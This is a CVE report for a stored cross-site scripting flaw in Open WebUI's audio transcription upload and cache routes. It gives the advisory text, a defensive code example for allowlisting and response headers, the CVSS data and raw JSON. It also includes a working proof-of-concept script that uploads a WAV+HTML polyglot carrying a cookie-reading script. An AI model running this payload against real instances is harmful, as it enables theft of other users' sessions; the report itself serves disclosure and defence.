Security Vulnerability Report
CVE-2026-45315 CVSS 8.7 HIGH

Published: 2026-05-15 22:16:54
Last Modified: 2026-05-15 22:16:54

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHE_DIR/audio/transcriptions/. The /cache/{path} route serves these files via FileResponse, which sets Content-Type from the on-disk extension and emits no Content-Disposition. A verified user with the default-on chat.stt permission can upload a polyglot WAV+HTML file named pwn.html and trick any other user into opening the resulting URL: the response comes back as text/html and any embedded <script> runs in the Open WebUI origin. This vulnerability is fixed in 0.9.3.
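A defensive counterpart to the description above, as an added example that is neither Open WebUI's code nor the 0.9.3 fix: the extension allowlist, the storage-name derivation and the header set are assumptions chosen for this illustration. It shows the two controls the description implies, never deriving the stored extension from the client's filename, and serving cache files with an explicit media type, Content-Disposition: attachment and nosniff, plus why a magic-byte check alone would not have helped against a WAV+HTML polyglot.

```python
import os
import uuid

# Constructed allowlist for this example (not Open WebUI's own list): the
# extensions the transcription cache may store, each bound to a fixed media type.
AUDIO_TYPES = {
    ".wav": "audio/wav", ".mp3": "audio/mpeg", ".m4a": "audio/mp4",
    ".ogg": "audio/ogg", ".webm": "audio/webm",
}

def looks_like_wav(data: bytes) -> bool:
    """Magic-byte check: RIFF container whose form type is WAVE."""
    return len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"WAVE"

def allowed_extension(user_filename: str) -> "str | None":
    """Lower-cased extension if it is on the allowlist, otherwise None.

    This is the check the vulnerable endpoint lacks: it reuses the extension of
    the client's filename ("pwn.html"), which later decides the Content-Type.
    """
    ext = os.path.splitext(os.path.basename(user_filename))[1].lower()
    return ext if ext in AUDIO_TYPES else None

def storage_name(user_filename: str) -> str:
    """On-disk name: random id plus allowlisted extension; nothing user-chosen survives."""
    ext = allowed_extension(user_filename)
    if ext is None:
        raise ValueError(f"extension not allowed for audio upload: {user_filename!r}")
    return uuid.uuid4().hex + ext

def cache_headers(stored_name: str) -> dict:
    """Headers for a /cache/{path} response so the body can never render as a page."""
    ext = os.path.splitext(stored_name)[1].lower()
    return {
        # Media type comes from the allowlist, never from sniffing or guessing.
        "Content-Type": AUDIO_TYPES.get(ext, "application/octet-stream"),
        # Download instead of inline rendering in the application origin.
        "Content-Disposition": f'attachment; filename="{os.path.basename(stored_name)}"',
        # Tell browsers not to second-guess the declared type.
        "X-Content-Type-Options": "nosniff",
    }

if __name__ == "__main__":
    # Constructed sample in the shape the advisory describes: a RIFF/WAVE header
    # followed by markup. It passes the magic check, so naming and headers matter.
    sample = b"RIFF\x24\x00\x00\x00WAVEfmt " + b"<html><body>not audio</body></html>"
    print("magic check passes:", looks_like_wav(sample))
    print("pwn.html accepted:", allowed_extension("pwn.html") is not None)
    print(cache_headers(storage_name("voice.wav")))
```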

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL
url = "http://target-open-webui-url/api/v1/audio/transcriptions"

# 1. Create a polyglot file (WAV header + HTML)
# WAV header structure (minimal)
wav_header = b"RIFF\x24\x00\x00\x00WAVEfmt "
wav_header += b"\x10\x00\x00\x00\x01\x00\x01\x00\x44\xAC\x00\x00\x88\x58\x01\x00\x02\x00\x10\x00"
wav_header += b"data\x00\x00\x00\x00"

# Malicious HTML content
html_payload = b"<html><body><script>alert(document.cookie);</script></body></html>"

# Combine to create polyglot
polyglot_data = wav_header + html_payload

# 2. Upload the file
files = {
    'file': ('pwn.html', polyglot_data, 'audio/wav')
}

# Attacker's headers (valid session required)
headers = {
    'Authorization': 'Bearer <valid_token>'
}

response = requests.post(url, files=files, headers=headers)

if response.status_code == 200:
    print("[+] Upload successful!")
    print(f"[+] Access the payload at: /cache/audio/transcriptions/pwn.html")
else:
    print("[-] Upload failed")

References

https://github.com/open-webui/open-webui/security/advisories/GHSA-m8f9-9whg-f4xr

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-45315",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-15T22:16:54.250",
    "lastModified": "2026-05-15T22:16:54.250",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHE_DIR/audio/transcriptions/.. The /cache/{path} route serves these files via FileResponse, which sets Content-Type from the on-disk extension and emits no Content-Disposition. A verified user with the default-on chat.stt permission can upload a polyglot WAV+HTML file named pwn.html and trick any other user into opening the resulting URL — the response comes back as text/html and any embedded <script> runs in the Open WebUI origin. This vulnerability is fixed in 0.9.3."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 5.8
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-79"},
          {"lang": "en", "value": "CWE-434"},
          {"lang": "en", "value": "CWE-646"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-m8f9-9whg-f4xr",
        "source": "[email protected]"
      }
    ]
  }
}